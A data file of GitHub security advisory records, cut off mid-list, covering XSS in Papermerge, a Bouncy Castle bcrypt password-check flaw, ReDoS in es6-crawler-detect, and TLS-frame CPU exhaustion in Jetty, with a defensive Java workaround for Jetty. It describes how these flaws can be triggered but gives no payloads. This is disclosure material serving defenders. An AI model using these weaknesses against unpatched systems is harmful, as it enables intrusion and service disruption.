+1.4.0,GHSA-9w49-m7xh-5r39,2021-04-09T21:59:25Z,2021-04-20T16:37:56Z,,['CVE-2020-29456'],Cross-site scripting in papermerge,"Multiple cross-site scripting (XSS) vulnerabilities in Papermerge before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the rename, tag, upload, or create folder function. The payload can be in a folder, a tag, or a document's filename. If email consumption is configured in Papermerge, a malicious document can be sent by email and is automatically uploaded into the Papermerge web application. Therefore, no authentication is required to exploit XSS if email consumption is configured. Otherwise authentication is required.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'papermerge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29456'}, {'type': 'WEB', 'url': 'https://github.com/ciur/papermerge/issues/228'}, {'type': 'WEB', 'url': 'https://github.com/ciur/papermerge/releases/tag/v1.5.2'}, {'type': 'WEB', 'url': 'https://www.papermerge.com/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:59:25Z', 'nvd_published_at': '2020-12-02T08:15:00Z'}"
+1.4.0,GHSA-73xv-w5gp-frxh,2022-02-08T22:01:10Z,2021-04-30T16:14:15Z,,['CVE-2020-28052'],Logic error in Legion of the Bouncy Castle BC Java,"An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15to18'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk15on'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk15on'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk14'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.bouncycastle:bcprov-ext-jdk16'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.65'}, {'fixed': '1.67'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28052'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/commit/97578f9b7ed277e6ecb58834e85e3d18385a4219'}, {'type': 'PACKAGE', 'url': 'https://github.com/bcgit/bc-java'}, {'type': 'WEB', 'url': 'https://github.com/bcgit/bc-java/wiki/CVE-2020-28052'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r167dbc42ef7c59802c2ca1ac14735ef9cf687c25208229993d6206fe@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r175f5a25d100dbe2b1bd3459b3ce882a84c3ff91b120ed4ff2d57b53@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ddabd06d94b60cfb0141e4abb23201c628ab925e30742f61a04d013@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r30a139c165b3da6e0d5536434ab1550534011b1fdfcd2f5d95892c5b@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r37d332c0bf772f4982d1fdeeb2f88dd71dab6451213e69e43734eadc@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4e1619cfefcd031fac62064a3858f5c9229eef907bd5d8ef14c594fc@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r77af3ac7c3bfbd5454546e13faf7aec21d627bdcf36c9ca240436b94@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9e441c1576bdc4375d32526d5cf457226928e9c87b9f54ded26271c@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd37d9214b08067a2e8f2b5b4fd123a1f8cb6008698d11ef44028c21@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdcbad6d8ce72c79827ed8c635f9a62dd919bb21c94a0b64cab2efc31@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddd2237b8636a48d573869006ee809262525efb2b6ffa6eff50d2a2d@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9abfc0223747a56694825c050cc6b66627a293a32ea926b3de22402@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc0db1f3c375087e69a239f9284ded72d04fbb55849eadde58fa9dc2@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.bouncycastle.org/releasenotes.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle/'}]","{'cwe_ids': ['CWE-670'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T00:15:55Z', 'nvd_published_at': '2020-12-18T01:15:00Z'}"
+1.4.0,GHSA-jxg6-fhwc-9v9c,2021-03-23T19:29:27Z,2021-04-13T15:19:39Z,,['CVE-2020-28501'],Regular Expression Denial of Service (ReDoS) in es6-crawler-detect,This affects the package es6-crawler-detect before 3.1.3. No limitation of user agent string length supplied to regex operators.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'es6-crawler-detect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28501'}, {'type': 'WEB', 'url': 'https://github.com/JefferyHus/es6-crawler-detect/pull/27'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ES6CRAWLERDETECT-1051529'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T19:29:27Z', 'nvd_published_at': '2021-03-22T12:15:00Z'}"
+1.4.0,GHSA-26vr-8j45-3r4w,2022-08-10T23:33:55Z,2021-04-06T17:31:30Z,,['CVE-2021-28165'],"Jetty vulnerable to incorrect handling of invalid large TLS frame, exhausting CPU resources","### Impact
+When using SSL/TLS with Jetty, either with HTTP/1.1, HTTP/2, or WebSocket, the server may receive an invalid large (greater than 17408) TLS frame that is incorrectly handled, causing CPU resources to eventually reach 100% usage.
+
+### Workarounds
+
+The problem can be worked around by compiling the following class:
+```java
+package org.eclipse.jetty.server.ssl.fix6072;
+
+import java.nio.ByteBuffer;
+import javax.net.ssl.SSLEngine;
+import javax.net.ssl.SSLEngineResult;
+import javax.net.ssl.SSLException;
+import javax.net.ssl.SSLHandshakeException;
+
+import org.eclipse.jetty.io.EndPoint;
+import org.eclipse.jetty.io.ssl.SslConnection;
+import org.eclipse.jetty.server.Connector;
+import org.eclipse.jetty.server.SslConnectionFactory;
+import org.eclipse.jetty.util.BufferUtil;
+import org.eclipse.jetty.util.annotation.Name;
+import org.eclipse.jetty.util.ssl.SslContextFactory;
+
+public class SpaceCheckingSslConnectionFactory extends SslConnectionFactory
+{
+ public SpaceCheckingSslConnectionFactory(@Name(""sslContextFactory"") SslContextFactory factory, @Name(""next"") String nextProtocol)
+ {
+ super(factory, nextProtocol);
+ }
+
+ @Override
+ protected SslConnection newSslConnection(Connector connector, EndPoint endPoint, SSLEngine engine)
+ {
+ return new SslConnection(connector.getByteBufferPool(), connector.getExecutor(), endPoint, engine, isDirectBuffersForEncryption(), isDirectBuffersForDecryption())
+ {
+ @Override
+ protected SSLEngineResult unwrap(SSLEngine sslEngine, ByteBuffer input, ByteBuffer output) throws SSLException
+ {
+ SSLEngineResult results = super.unwrap(sslEngine, input, output);
+
+ if ((results.getStatus() == SSLEngineResult.Status.BUFFER_UNDERFLOW ||
+ results.getStatus() == SSLEngineResult.Status.OK && results.bytesConsumed() == 0 && results.bytesProduced() == 0) &&
+ BufferUtil.space(input) == 0)
+ {
+ BufferUtil.clear(input);
+ throw new SSLHandshakeException(""Encrypted buffer max length exceeded"");
+ }
+ return results;
+ }
+ };
+ }
+}
+```
+This class can be deployed by:
+ + The resulting class file should be put into a jar file (eg sslfix6072.jar)
+ + The jar file should be made available to the server. For a normal distribution this can be done by putting the file into ${jetty.base}/lib
+ + Copy the file `${jetty.home}/modules/ssl.mod` to `${jetty.base}/modules`
+ + Edit the `${jetty.base}/modules/ssl.mod` file to have the following section:
+
+```
+[lib]
+lib/sslfix6072.jar
+```
+
++ Copy the file `${jetty.home}/etc/jetty-https.xml` and`${jetty.home}/etc/jetty-http2.xml` to `${jetty.base}/etc`
++ Edit files `${jetty.base}/etc/jetty-https.xml` and `${jetty.base}/etc/jetty-http2.xml`, changing any reference of `org.eclipse.jetty.server.SslConnectionFactory` to `org.eclipse.jetty.server.ssl.fix6072.SpaceCheckingSslConnectionFactory`. For example:
+```xml
+
+
+
+ http/1.1
+
+
+
+
+```
++ Restart Jetty","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.2.2'}, {'fixed': '9.4.39'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-26vr-8j45-3r4w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28165'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r002258611ed0c35b82b839d284b43db9dcdec120db8afc1c993137dc@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r03ca0b69db1e3e5f72fe484b71370d537cd711cbf334e2913332730a@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r05db8e0ef01e1280cc7543575ae0fa1c2b4d06a8b928916ef65dd2ad@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06d54a297cb8217c66e5190912a955fb870ba47da164002bf2baffe5@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r077b76cafb61520c14c87c4fc76419ed664002da0ddac5ad851ae7e7@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a241b0649beef90d422b42a26a2470d336e59e66970eafd54f9c3e2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a4797ba6ceea8074f47574a4f3cc11493d514c1fab8203ebd212add@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bf3aa065abd23960fc8bdc8090d6bc00d5e391cf94ec4e1f4537ae3@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0cd1a5e3f4ad4770b44f8aa96572fc09d5b35bec149c0cc247579c42@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0f02034a33076fd7243cf3a8807d2766e373f5cb2e7fd0c9a78f97c4@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17e26cf9a1e3cbc09522d15ece5d7c7a00cdced7641b92a22a783287@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r23785214d47673b811ef119ca3a40f729801865ea1e891572d15faa6@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2afc72af069a7fe89ca2de847f3ab3971cb1d668a9497c999946cd78@%3Ccommits.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f2d9c3b7cc750a6763d6388bcf5db0c7b467bd8be6ac4d6aea4f0cf@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31f591a0deac927ede8ccc3eac4bb92697ee2361bf01549f9e3440ca@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r33eb3889ca0aa12720355e64fc2f8f1e8c0c28a4d55b3b4b8891becb@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r40136c2010fccf4fb2818a965e5d7ecca470e5f525c232ec5b8eb83a@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r401b1c592f295b811608010a70792b11c91885b72af9f9410cffbe35@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r411d75dc6bcefadaaea246549dd18e8d391a880ddf28a796f09ce152@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r47a7542ab61da865fff3db0fe74bfe76c89a37b6e6d2c2a423f8baee@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4891d45625cc522fe0eb764ac50d48bcca9c0db4805ea4a998d4c225@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4abbd760d24bab2b8f1294c5c9216ae915100099c4391ad64e9ae38b@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r520c56519b8820955a86966f499e7a0afcbcf669d6f7da59ef1eb155@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r56e5568ac73daedcb3b5affbb4b908999f03d3c1b1ada3920b01e959@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5d1f16dca2e010193840068f1a1ec17b7015e91acc646607cbc0a4da@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f172f2dd8fb02f032ef4437218fd4f610605a3dd4f2a024c1e43b94@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r64ff94118f6c80e6c085c6e2d51bbb490eaefad0642db8c936e4f0b7@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6535b2beddf0ed2d263ab64ff365a5f790df135a1a2f45786417adb7@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r65daad30d13f7c56eb5c3d7733ad8dddbf62c469175410777a78d812@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r694e57d74fcaa48818a03c282aecfa13ae68340c798dfcb55cb7acc7@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b070441871a4e6ce8bb63e190c879bb60da7c5e15023de29ebd4f9f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ce2907b2691c025250ba010bc797677ef78d5994d08507a2e5477c9@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6f256a1d15505f79f4050a69bb8f27b34cb353604dd2f765c9da5df7@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71031d0acb1de55c9ab32f4750c50ce2f28543252e887ca03bd5621e@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7189bf41cb0c483629917a01cf296f9fbdbda3987084595192e3845d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72bf813ed4737196ea3ed26494e949577be587fd5939fe8be09907c7@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r746434be6abff9ad321ff54ecae09e1f09c1c7c139021f40a5774090@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r769155244ca2da2948a44091bb3bb9a56e7e1c71ecc720b8ecf281f0@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bf7004c18c914fae3d5a6a0191d477e5b6408d95669b3afbf6efa36@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7c40fb3a66a39b6e6c83b0454bc6917ffe6c69e3131322be9c07a1da@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r81748d56923882543f5be456043c67daef84d631cf54899082058ef1@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r83453ec252af729996476e5839d0b28f07294959d60fea1bd76f7d81@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90327f55db8f1d079f9a724aabf1f5eb3c00c1de49dc7fd04cad1ebc@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r940f15db77a96f6aea92d830bc94d8d95f26cc593394d144755824da@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r942f4a903d0abb25ac75c592e57df98dea51350e8589269a72fd7913@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b793db9f395b546e66fb9c44fe1cd75c7755029e944dfee31b8b779@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9db72e9c33b93eba45a214af588f1d553839b5c3080fc913854a49ab@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9fae5a4087d9ed1c9d4f0c7493b6981a4741cfb4bebb2416da638424@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra210e38ae0bf615084390b26ba01bb5d66c0a76f232277446ae0948a@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra21b3e6bd9669377139fe33fb46edf6fece3f31375bc42a0dcc964b2@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra50519652b0b7f869a14fbfb4be9758a29171d7fe561bb7e036e8449@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9dd15ba8a4fb7e42c7fe948a6d6b3868fd6bbf8e3fb37fcf33b2cd0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae8bbc5a516f3e21b8a55e61ff6ad0ced03bdbd116d2170a3eed9f5c@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raea6e820644e8c5a577f77d4e2044f8ab52183c2536b00c56738beef@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb00345f6b1620b553d2cc1acaf3017aa75cea3776b911e024fa3b187@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb11a13e623218c70b9f2a2d0d122fdaaf905e04a2edcd23761894464@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb1624b9777a3070135e94331a428c6653a6a1edccd56fa9fb7a547f2@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb2d34abb67cdf525945fe4b821c5cdbca29a78d586ae1f9f505a311c@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb66ed0b4bb74836add60dd5ddf9172016380b2aeefb7f96fe348537b@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb8f5a6ded384eb00608e6137e87110e7dd7d5054cc34561cb89b81af@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbab9e67ec97591d063905bc7d4743e6a673f1bc457975fc0445ac97f@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbba0b02a3287e34af328070dd58f7828612f96e2e64992137f4dc63d@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbcd7b477df55857bb6cae21fcc4404683ac98aac1a47551f0dc55486@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbd9a837a18ca57ac0d9b4165a6eec95ee132f55d025666fe41099f33@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4779abc1cface47e956cf9f8910f15d79c24477e7b1ac9be076a825@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc4dbc9907b0bdd634200ac90a15283d9c143c11af66e7ec72128d020@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc6c43c3180c0efe00497c73dd374cd34b62036cb67987ad42c1f2dce@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc907ed7b089828364437de5ed57fa062330970dc1bc5cd214b711f77@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcdea97f4d3233298296aabc103c9fcefbf629425418c2b69bb16745f@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd24d8a059233167b4a5aebda4b3534ca1d86caa8a85b10a73403ee97@%3Ccommits.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd6c1eb9a8a94b3ac8a525d74d792924e8469f201b77e1afcf774e7a6@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd755dfe5f658c42704540ad7950cebd136739089c3231658e398cf38@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd9ea411a58925cc82c32e15f541ead23cb25b4b2d57a2bdb0341536e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdbf2a2cd1800540ae50dd78b57411229223a6172117d62b8e57596aa@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdde34d53aa80193cda016272d61e6749f8a9044ccb37a30768938f7e@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf4fe435891e8c35e70ea5da033b4c3da78760f15a8c4212fad89d9f@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdfe5f1c071ba9dadba18d7fb0ff13ea6ecb33da624250c559999eaeb@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0545ecced2d468c94ce4dcfa37d40a9573cc68ef5f6839ffca9c1c1@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3a1617d16a7367f767b8209b2151f4c19958196354b39568c532f26@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re577736ca7da51952c910b345a500b7676ea9931c9b19709b87f292b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re6614b4fe7dbb945409daadb9e1cc73c02383df68bf9334736107a6e@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 